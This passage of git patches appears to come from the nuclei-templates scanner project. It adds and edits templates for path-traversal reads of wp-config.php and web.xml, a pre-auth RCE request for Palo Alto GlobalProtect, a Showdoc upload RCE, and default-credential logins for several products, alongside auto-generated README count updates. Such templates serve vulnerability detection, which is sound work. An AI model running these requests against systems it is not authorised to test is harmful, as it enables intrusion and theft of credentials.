00:00:00 2001 From: Prince Chaddha Date: Sat, 17 Jul 2021 10:19:09 +0530 Subject: [PATCH 105/132] Update CVE-2016-1000135.yaml --- cves/2016/CVE-2016-1000135.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2016/CVE-2016-1000135.yaml b/cves/2016/CVE-2016-1000135.yaml index f7703f0121..ba16e3c957 100644 --- a/cves/2016/CVE-2016-1000135.yaml +++ b/cves/2016/CVE-2016-1000135.yaml @@ -4,6 +4,7 @@ info: name: HDW WordPress Video Gallery <= 1.2 - Reflected Cross-Site Scripting (XSS) via mychannel.php author: daffainfo severity: medium + description: Reflected XSS in wordpress plugin hdw-tube v1.2 reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000135 tags: cve,cve2016,wordpress,xss,wp-plugin From a8d8444747e8d0a53f7da620dfc621e9f53fa03f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 17 Jul 2021 04:49:37 +0000 Subject: [PATCH 106/132] Auto Update README [Sat Jul 17 04:49:37 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 8f529b5222..b6c6064f64 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 457 | vulnerabilities | 235 | exposed-panels | 200 | +| cves | 458 | vulnerabilities | 235 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 123 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1583 files**. +**128 directories, 1584 files**. From 64851da36d536f797c196e25edf8d66af53a60f9 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 17 Jul 2021 04:51:13 +0000 Subject: [PATCH 107/132] Auto Update README [Sat Jul 17 04:51:13 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index b6c6064f64..0e1cd9e088 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 458 | vulnerabilities | 235 | exposed-panels | 200 | +| cves | 459 | vulnerabilities | 235 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 123 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1584 files**. +**128 directories, 1585 files**. From 01adebd94c00e8f2caa5c5a29f25970eb88a4c13 Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Sat, 17 Jul 2021 19:38:12 +0900 Subject: [PATCH 108/132] Create wp-plugin-memphis-documents-library-lfi.yaml --- wp-plugin-memphis-documents-library-lfi.yaml | 27 ++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 wp-plugin-memphis-documents-library-lfi.yaml diff --git a/wp-plugin-memphis-documents-library-lfi.yaml b/wp-plugin-memphis-documents-library-lfi.yaml new file mode 100644 index 0000000000..a5a571178e --- /dev/null +++ b/wp-plugin-memphis-documents-library-lfi.yaml @@ -0,0 +1,27 @@ +id: wp-plugin-memphis-documents-library-lfi + +info: + name: WordPress Plugin Memphis Document Library 3.1.5 LFI + severity: high + tags: wordpress,wp-plugin,lfi,rfd + description: arbitrary file download in Memphis Document Library 3.1.5 + reference: https://www.exploit-db.com/exploits/39593 + +requests: + - method: GET + path: + - '{{BaseURL}}/mdocs-posts/?mdocs-img-preview=../../../wp-config.php' + - '{{BaseURL}}/?mdocs-img-preview=../../../wp-config.php' + + matchers-condition: and + matchers: + - type: word + words: + - "DB_NAME" + - "DB_PASSWORD" + part: body + condition: and + + - type: status + status: + - 200 From 1da88455ecd042fece7b66f62d2d5eb74ea4c0bf Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Sat, 17 Jul 2021 19:47:45 +0900 Subject: [PATCH 109/132] Update wp-plugin-memphis-documents-library-lfi.yaml --- wp-plugin-memphis-documents-library-lfi.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/wp-plugin-memphis-documents-library-lfi.yaml b/wp-plugin-memphis-documents-library-lfi.yaml index a5a571178e..9529fce228 100644 --- a/wp-plugin-memphis-documents-library-lfi.yaml +++ b/wp-plugin-memphis-documents-library-lfi.yaml @@ -2,6 +2,7 @@ id: wp-plugin-memphis-documents-library-lfi info: name: WordPress Plugin Memphis Document Library 3.1.5 LFI + author: 0x_Akoko severity: high tags: wordpress,wp-plugin,lfi,rfd description: arbitrary file download in Memphis Document Library 3.1.5 From fc38b27176c18869421f8df8099c317b1b68b6ce Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 17 Jul 2021 16:32:15 +0530 Subject: [PATCH 110/132] minor update --- .../wordpress/wp-memphis-documents-library-lfi.yaml | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) rename wp-plugin-memphis-documents-library-lfi.yaml => vulnerabilities/wordpress/wp-memphis-documents-library-lfi.yaml (64%) diff --git a/wp-plugin-memphis-documents-library-lfi.yaml b/vulnerabilities/wordpress/wp-memphis-documents-library-lfi.yaml similarity index 64% rename from wp-plugin-memphis-documents-library-lfi.yaml rename to vulnerabilities/wordpress/wp-memphis-documents-library-lfi.yaml index 9529fce228..4091668e07 100644 --- a/wp-plugin-memphis-documents-library-lfi.yaml +++ b/vulnerabilities/wordpress/wp-memphis-documents-library-lfi.yaml @@ -1,12 +1,14 @@ -id: wp-plugin-memphis-documents-library-lfi +id: wp-memphis-documents-library-lfi info: name: WordPress Plugin Memphis Document Library 3.1.5 LFI author: 0x_Akoko severity: high - tags: wordpress,wp-plugin,lfi,rfd - description: arbitrary file download in Memphis Document Library 3.1.5 - reference: https://www.exploit-db.com/exploits/39593 + tags: wordpress,wp-plugin,lfi + description: Arbitrary file download in Memphis Document Library 3.1.5 + reference: | + - https://www.exploit-db.com/exploits/39593 + - https://wpscan.com/vulnerability/53999c06-05ca-44f1-b713-1e4d6b4a3f9f requests: - method: GET From a526e5dad96952ad89e9c0c3236ef0b107f9c31e Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 17 Jul 2021 11:22:26 +0000 Subject: [PATCH 111/132] Auto Update README [Sat Jul 17 11:22:26 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 0e1cd9e088..6d6ebd7b7f 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 459 | vulnerabilities | 235 | exposed-panels | 200 | +| cves | 459 | vulnerabilities | 236 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 123 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1585 files**. +**128 directories, 1586 files**. From 450c6b36900818a2c17da00cdcd53c20883f9fe3 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 17 Jul 2021 17:07:28 +0530 Subject: [PATCH 112/132] Updated POC for CVE-2017-15944 --- cves/2017/CVE-2017-15944.yaml | 22 +++++++++++++--------- 1 file changed, 13 insertions(+), 9 deletions(-) diff --git a/cves/2017/CVE-2017-15944.yaml b/cves/2017/CVE-2017-15944.yaml index 45e7bfda4b..2d6bd7fbd0 100644 --- a/cves/2017/CVE-2017-15944.yaml +++ b/cves/2017/CVE-2017-15944.yaml @@ -2,23 +2,27 @@ id: CVE-2017-15944 info: name: PreAuth RCE on Palo Alto GlobalProtect - author: emadshanab - reference: http://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html + author: emadshanab,milo2012 + reference: | + - https://www.exploit-db.com/exploits/43342 + - http://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html severity: high - tags: cve,cve2017,rce,vpn,paloalto + tags: cve,cve2017,rce,vpn,paloalto,globalprotect requests: - - method: GET - path: - - "{{BaseURL}}/global-protect/portal/css/login.css" + - raw: + - | + GET /esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337"; HTTP/1.1 + Host: {{Hostname}} + Cookie: PHPSESSID={{randstr}}; matchers-condition: and matchers: - type: word words: - - "Last-Modified: Sun, 10 Sep 2017 16:48:23 GMT" - part: header + - "@start@Success@end@" + part: body - type: status status: - - 200 + - 200 \ No newline at end of file From 088a0bd7df1c063b62f1849c67c2fb33f7e8acdb Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 17 Jul 2021 18:05:27 +0530 Subject: [PATCH 113/132] Updated matchers --- default-logins/aem/adobe-aem-default-credentials.yaml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/default-logins/aem/adobe-aem-default-credentials.yaml b/default-logins/aem/adobe-aem-default-credentials.yaml index b6aacc7e67..254903e532 100644 --- a/default-logins/aem/adobe-aem-default-credentials.yaml +++ b/default-logins/aem/adobe-aem-default-credentials.yaml @@ -57,9 +57,11 @@ requests: matchers: - type: status status: - - 302 + - 200 - type: word part: header words: - - crx + - login-token + - crx.default + condition: and From 2bd83ae640ce416901b7e259e9b66429aced53e1 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 17 Jul 2021 12:41:33 +0000 Subject: [PATCH 114/132] Auto Update README [Sat Jul 17 12:41:32 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 6d6ebd7b7f..632ff9adf9 100644 --- a/README.md +++ b/README.md @@ -41,10 +41,10 @@ An overview of the nuclei template directory including number of templates assoc | cves | 459 | vulnerabilities | 236 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 123 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | -| default-logins | 37 | file | 42 | dns | 10 | +| default-logins | 38 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1586 files**. +**129 directories, 1587 files**. From 82c4e8762a3bd023cd9b43b6ef1ad8322432448e Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Sat, 17 Jul 2021 18:23:05 +0530 Subject: [PATCH 115/132] Added aem-detection Reference - https://github.com/shifa123/detections --- technologies/aem-detection.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 technologies/aem-detection.yaml diff --git a/technologies/aem-detection.yaml b/technologies/aem-detection.yaml new file mode 100644 index 0000000000..85399c2790 --- /dev/null +++ b/technologies/aem-detection.yaml @@ -0,0 +1,26 @@ +id: aem-detection + +info: + name: Favicon based AEM Detection + severity: info + author: shifacyclewala,hackergautam + tags: aem,favicon,tech + reference: | + - https://twitter.com/brsn76945860/status/1171233054951501824 + - https://gist.github.com/yehgdotnet/b9dfc618108d2f05845c4d8e28c5fc6a + - https://medium.com/@Asm0d3us/weaponizing-favicon-ico-for-bugbounties-osint-and-what-not-ace3c214e139 + - https://github.com/devanshbatham/FavFreak + - https://github.com/sansatart/scrapts/blob/master/shodan-favicon-hashes.csv + +requests: + - method: GET + path: + - "{{BaseURL}}/libs/granite/core/content/login/favicon.ico" + + redirects: true + max-redirects: 2 + + matchers: + - type: dsl + dsl: + - "status_code==200 && (\"-144483185\" == mmh3(base64_py(body)))" From 99a6f78dd1c7c28f691e5ed68e23eca9754ca9b9 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 17 Jul 2021 18:31:38 +0530 Subject: [PATCH 116/132] Updated AEM workflow --- workflows/aem-workflow.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/workflows/aem-workflow.yaml b/workflows/aem-workflow.yaml index c0f15c89d2..ff8f7019c7 100644 --- a/workflows/aem-workflow.yaml +++ b/workflows/aem-workflow.yaml @@ -7,4 +7,6 @@ info: tags: workflow workflows: - - template: misconfiguration/aem/ \ No newline at end of file + - template: technologies/aem-detection.yaml + subtemplates: + - tags: aem \ No newline at end of file From 1431a9611ca8d30d3492e85467d9160138f06309 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 17 Jul 2021 13:05:20 +0000 Subject: [PATCH 117/132] Auto Update README [Sat Jul 17 13:05:20 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 632ff9adf9..90de9948ae 100644 --- a/README.md +++ b/README.md @@ -39,12 +39,12 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | | cves | 459 | vulnerabilities | 236 | exposed-panels | 200 | -| takeovers | 70 | exposures | 116 | technologies | 123 | +| takeovers | 70 | exposures | 116 | technologies | 124 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 38 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**129 directories, 1587 files**. +**129 directories, 1588 files**. From 41436ccef8798a055b862a37453cccc8a93dfabe Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 17 Jul 2021 21:44:56 +0530 Subject: [PATCH 118/132] matcher update --- cves/2013/CVE-2013-3827.yaml | 18 ++++++++++++++---- 1 file changed, 14 insertions(+), 4 deletions(-) diff --git a/cves/2013/CVE-2013-3827.yaml b/cves/2013/CVE-2013-3827.yaml index af44677113..d6883d7e82 100644 --- a/cves/2013/CVE-2013-3827.yaml +++ b/cves/2013/CVE-2013-3827.yaml @@ -1,11 +1,14 @@ id: CVE-2013-3827 info: - name: CVE-2013-3827 + name: Javafaces LFI author: Random-Robbie severity: medium - description: Javafaces LFI - tags: cve,cve2013,lfi + description: Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Fusion Middleware 2.1.1, 3.0.1, and 3.1.2; the Oracle JDeveloper component in Oracle Fusion Middleware 11.1.2.3.0, 11.1.2.4.0, and 12.1.2.0.0; and the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0 and 12.1.1 allows remote attackers to affect confidentiality via unknown vectors related to Java Server Faces or Web Container. + tags: cve,cve2013,lfi,javafaces,oracle + reference: | + - https://nvd.nist.gov/vuln/detail/CVE-2013-3827 + - https://www.exploit-db.com/exploits/38802 requests: - method: GET @@ -20,9 +23,16 @@ requests: - "{{BaseURL}}/myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.." - "{{BaseURL}}/SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF" - "{{BaseURL}}/SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.." + matchers-condition: and matchers: - type: word words: - - "web-app version" + - "" part: body + condition: and + + - type: status + status: + - 200 \ No newline at end of file From e0bbc7f160283ab969254b1f6af325c1c230bb18 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 17 Jul 2021 16:20:40 +0000 Subject: [PATCH 119/132] Auto Update README [Sat Jul 17 16:20:39 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 90de9948ae..42c3fbe9e1 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 459 | vulnerabilities | 236 | exposed-panels | 200 | +| cves | 460 | vulnerabilities | 236 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 124 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 38 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**129 directories, 1588 files**. +**129 directories, 1589 files**. From 1212034229b838e528740999577b12350f13e005 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 17 Jul 2021 16:40:05 +0000 Subject: [PATCH 120/132] Auto Update README [Sat Jul 17 16:40:05 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 42c3fbe9e1..75a881f2a5 100644 --- a/README.md +++ b/README.md @@ -41,10 +41,10 @@ An overview of the nuclei template directory including number of templates assoc | cves | 460 | vulnerabilities | 236 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 124 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | -| default-logins | 38 | file | 42 | dns | 10 | +| default-logins | 39 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**129 directories, 1589 files**. +**130 directories, 1590 files**. From e4f51a0286c2a7e94f926236c20466ce9244dc0d Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 17 Jul 2021 22:14:18 +0530 Subject: [PATCH 121/132] Update sap-igs-detect.yaml --- technologies/sap-igs-detect.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/technologies/sap-igs-detect.yaml b/technologies/sap-igs-detect.yaml index bab13679aa..5f57fd013e 100644 --- a/technologies/sap-igs-detect.yaml +++ b/technologies/sap-igs-detect.yaml @@ -31,7 +31,6 @@ requests: part: header words: - "SAP Internet Graphics Server" - condition: and extractors: - type: kval From 0debdc4cd18d37e23f4144095e0be5ca5501da94 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 17 Jul 2021 16:45:21 +0000 Subject: [PATCH 122/132] Auto Update README [Sat Jul 17 16:45:21 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 75a881f2a5..461fb9793e 100644 --- a/README.md +++ b/README.md @@ -39,12 +39,12 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | | cves | 460 | vulnerabilities | 236 | exposed-panels | 200 | -| takeovers | 70 | exposures | 116 | technologies | 124 | +| takeovers | 70 | exposures | 116 | technologies | 125 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 39 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**130 directories, 1590 files**. +**130 directories, 1591 files**. From 9eabca6e4caf3d03686a479b5e959ee7b67d0915 Mon Sep 17 00:00:00 2001 From: Prial Islam <25204004+0xPrial@users.noreply.github.com> Date: Sat, 17 Jul 2021 22:55:19 +0600 Subject: [PATCH 123/132] Updated Heroku and netlify takeover detection --- takeovers/heroku-takeover.yaml | 3 +-- takeovers/netlify-takeover.yaml | 6 +++--- 2 files changed, 4 insertions(+), 5 deletions(-) diff --git a/takeovers/heroku-takeover.yaml b/takeovers/heroku-takeover.yaml index 64115ff057..4a6ac2476e 100644 --- a/takeovers/heroku-takeover.yaml +++ b/takeovers/heroku-takeover.yaml @@ -2,7 +2,7 @@ id: heroku-takeover info: name: heroku takeover detection - author: pdteam + author: 0xPrial severity: high tags: takeover reference: https://github.com/EdOverflow/can-i-take-over-xyz @@ -15,7 +15,6 @@ requests: matchers: - type: word words: - - "There's nothing here, yet." - "herokucdn.com/error-pages/no-such-app.html" - "No such app" condition: and \ No newline at end of file diff --git a/takeovers/netlify-takeover.yaml b/takeovers/netlify-takeover.yaml index 9c447ac42f..02ec1285a5 100644 --- a/takeovers/netlify-takeover.yaml +++ b/takeovers/netlify-takeover.yaml @@ -2,7 +2,7 @@ id: netlify-takeover info: name: netlify takeover detection - author: pdteam + author: 0xPrial severity: high tags: takeover reference: https://github.com/EdOverflow/can-i-take-over-xyz @@ -16,9 +16,9 @@ requests: matchers: - type: word words: - - "Not Found" + - "Not found - Request ID:" - type: word words: - - "server: Netlify" + - "Netlify" part: header \ No newline at end of file From 63ae086b6792aec403dea53dde2b28082d01f004 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 17 Jul 2021 23:02:43 +0530 Subject: [PATCH 124/132] Payload + matcher update --- .../other/showdoc-file-upload-rce.yaml | 18 ++++++++++-------- 1 file changed, 10 insertions(+), 8 deletions(-) diff --git a/vulnerabilities/other/showdoc-file-upload-rce.yaml b/vulnerabilities/other/showdoc-file-upload-rce.yaml index a83e353f93..63fa6a1f77 100644 --- a/vulnerabilities/other/showdoc-file-upload-rce.yaml +++ b/vulnerabilities/other/showdoc-file-upload-rce.yaml @@ -1,4 +1,5 @@ id: showdoc-file-upload-rce + info: name: Showdoc < 2.8.6 File Upload RCE author: pikpikcu @@ -20,7 +21,7 @@ requests: Content-Disposition: form-data; name="editormd-image-file"; filename="test.<>php" Content-Type: text/plain - + ----------------------------835846770881083140190633-- - | @@ -37,11 +38,12 @@ requests: regex: - '/Uploads\\(.*?)"\,"success"' - req-condition: true + matchers-condition: and matchers: - - type: dsl - dsl: - - 'contains(body_2, "PHP Extension")' - - 'contains(body_2, "PHP Version")' - - 'status_code_2 == 200' - condition: and + - type: word + words: + - '3c7cb9f46815a790686b857fdbc4295a' + + - type: status + status: + - 200 \ No newline at end of file From 7ef332e9d07920ee088a672d3405940406d97458 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 17 Jul 2021 23:20:57 +0530 Subject: [PATCH 125/132] Added VisionHub Default Credentials --- .../visionhub-default-credentials.yaml | 27 +++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 default-logins/visionhub/visionhub-default-credentials.yaml diff --git a/default-logins/visionhub/visionhub-default-credentials.yaml b/default-logins/visionhub/visionhub-default-credentials.yaml new file mode 100644 index 0000000000..c4bb066e85 --- /dev/null +++ b/default-logins/visionhub/visionhub-default-credentials.yaml @@ -0,0 +1,27 @@ +id: visionhub-default-credentials + +info: + name: VisionHub Default Credentials + author: Techryptic (@Tech) + severity: high + description: Default Credentials of admin:admin on VisionHub application. + tags: visionhub,default-login + reference: https://www.qognify.com/products/visionhub/ + +requests: + - method: POST + path: + - '{{BaseURL}}/VisionHubWebApi/api/Login' + headers: + Authorization: Basic YWRtaW46YWRtaW4= + + matchers-condition: and + matchers: + - type: word + words: + - "Set-Cookie: admin" + part: header + + - type: status + status: + - 200 \ No newline at end of file From f58d78772492b0db1e828671eb33ac74a647410a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 17 Jul 2021 17:53:56 +0000 Subject: [PATCH 126/132] Auto Update README [Sat Jul 17 17:53:56 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 461fb9793e..b5c762b493 100644 --- a/README.md +++ b/README.md @@ -41,10 +41,10 @@ An overview of the nuclei template directory including number of templates assoc | cves | 460 | vulnerabilities | 236 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 125 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | -| default-logins | 39 | file | 42 | dns | 10 | +| default-logins | 40 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**130 directories, 1591 files**. +**131 directories, 1592 files**. From 08324918439629cc2b2055a2d6a3b3c935ab6ac2 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 17 Jul 2021 23:28:19 +0530 Subject: [PATCH 127/132] Added Dell EMC ECOM Default Credentials --- .../dell-emc-ecom-default-credentials.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 default-logins/dell/dell-emc-ecom-default-credentials.yaml diff --git a/default-logins/dell/dell-emc-ecom-default-credentials.yaml b/default-logins/dell/dell-emc-ecom-default-credentials.yaml new file mode 100644 index 0000000000..5c46e83359 --- /dev/null +++ b/default-logins/dell/dell-emc-ecom-default-credentials.yaml @@ -0,0 +1,31 @@ +id: dell-emc-ecom-default-credentials + +info: + name: Dell EMC ECOM Default Credentials + author: Techryptic (@Tech) + severity: high + description: Default Credentials of admin:#1Password on Dell EMC ECOM application. + reference: https://www.dell.com/support/kbdoc/en-za/000171270/vipr-controller-operation-denied-by-clariion-array-you-are-not-privileged-to-perform-the-requested-operation + tags: dell,emc,ecom,default-login + +requests: + - method: GET + path: + - '{{BaseURL}}' + headers: + Authorization: Basic YWRtaW46IzFQYXNzd29yZA== + + matchers-condition: and + matchers: + - type: word + words: + - "Set-Cookie: ECOMSecurity" + part: header + + - type: word + words: + - "Welcome to ECOM" + + - type: status + status: + - 200 \ No newline at end of file From 8030b4635519e05fb0c5dd0c710a0f9a00f95a77 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 17 Jul 2021 23:30:55 +0530 Subject: [PATCH 128/132] Added HortonWorks SmartSense Default Credentials --- ...nworks-smartsense-default-credentials.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 default-logins/hortonworks/hortonworks-smartsense-default-credentials.yaml diff --git a/default-logins/hortonworks/hortonworks-smartsense-default-credentials.yaml b/default-logins/hortonworks/hortonworks-smartsense-default-credentials.yaml new file mode 100644 index 0000000000..132cee76fd --- /dev/null +++ b/default-logins/hortonworks/hortonworks-smartsense-default-credentials.yaml @@ -0,0 +1,31 @@ +id: hortonworks-smartsense-default-credentials + +info: + name: HortonWorks SmartSense Default Credentials + author: Techryptic (@Tech) + severity: high + description: Default Credentials of admin:admin on HortonWorks SmartSense application. + reference: https://docs.cloudera.com/HDPDocuments/SS1/SmartSense-1.2.2/bk_smartsense_admin/content/manual_server_login.html + tags: hortonworks,smartsense,default-login + +requests: + - method: GET + path: + - '{{BaseURL}}/apt/v1/context' + headers: + Authorization: Basic YWRtaW46YWRtaW4= + + matchers-condition: and + matchers: + - type: word + words: + - "Set-Cookie: SUPPORTSESSIONID" + part: header + + - type: word + words: + - "smartsenseId" + + - type: status + status: + - 200 \ No newline at end of file From 78e7242792d12292cf77cade1a7e49903e7d789a Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 17 Jul 2021 23:35:39 +0530 Subject: [PATCH 129/132] Added Palo Alto Networks PAN-OS Default Credentials --- .../paloalto/panos-default-credentials.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 default-logins/paloalto/panos-default-credentials.yaml diff --git a/default-logins/paloalto/panos-default-credentials.yaml b/default-logins/paloalto/panos-default-credentials.yaml new file mode 100644 index 0000000000..15bc58afa5 --- /dev/null +++ b/default-logins/paloalto/panos-default-credentials.yaml @@ -0,0 +1,31 @@ +id: panos-default-credentials + +info: + name: Palo Alto Networks PAN-OS Default Credentials + author: Techryptic (@Tech) + severity: high + description: Default Credentials of admin:admin on Palo Alto Networks PAN-OS application. + reference: https://docs.paloaltonetworks.com/pan-os/8-1/pan-os-admin/getting-started/integrate-the-firewall-into-your-management-network/perform-initial-configuration.html#:~:text=By%20default%2C%20the%20firewall%20has,with%20other%20firewall%20configuration%20tasks. + tags: paloalto,panos,default-login + +requests: + - method: POST + path: + - '{{BaseURL}}/php/login.php' + + body: user=admin&passwd=admin&challengePwd=&ok=Login + + matchers-condition: and + matchers: + - type: word + words: + - "Set-Cookie: PHPSESSID" + part: header + + - type: word + words: + - "Warning: Your device is still configured with the default admin" + + - type: status + status: + - 200 \ No newline at end of file From 9e85e024d3090c0070fc28960c58a9330ff45dc0 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 17 Jul 2021 23:51:55 +0530 Subject: [PATCH 130/132] Added IDEMIA BIOMetrics Default Credentials --- ...idemia-biometrics-default-credentials.yaml | 34 +++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 default-logins/idemia/idemia-biometrics-default-credentials.yaml diff --git a/default-logins/idemia/idemia-biometrics-default-credentials.yaml b/default-logins/idemia/idemia-biometrics-default-credentials.yaml new file mode 100644 index 0000000000..da3d4290e4 --- /dev/null +++ b/default-logins/idemia/idemia-biometrics-default-credentials.yaml @@ -0,0 +1,34 @@ +id: idemia-biometrics-default-credentials + +info: + name: IDEMIA BIOMetrics Default Credentials + author: Techryptic (@Tech) + severity: high + description: Default Credentials of password=12345 on IDEMIA BIOMetrics application. + reference: https://www.google.com/search?q=idemia+password%3D+"12345" + tags: idemia,biometrics,default-login + +requests: + - method: POST + path: + - '{{BaseURL}}/cgi-bin/login.cgi' + + body: password=12345 + + matchers-condition: and + matchers: + - type: word + words: + - "session_id=" + - "resource" + condition: and + + - type: word + words: + - "Invalid Password" + part: body + negative: true + + - type: status + status: + - 200 \ No newline at end of file From 14dac081716f55f25123085e2e8d557be8bbf373 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 17 Jul 2021 18:23:30 +0000 Subject: [PATCH 131/132] Auto Update README [Sat Jul 17 18:23:29 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index b5c762b493..b6fb139ccd 100644 --- a/README.md +++ b/README.md @@ -41,10 +41,10 @@ An overview of the nuclei template directory including number of templates assoc | cves | 460 | vulnerabilities | 236 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 125 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | -| default-logins | 40 | file | 42 | dns | 10 | +| default-logins | 44 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**131 directories, 1592 files**. +**134 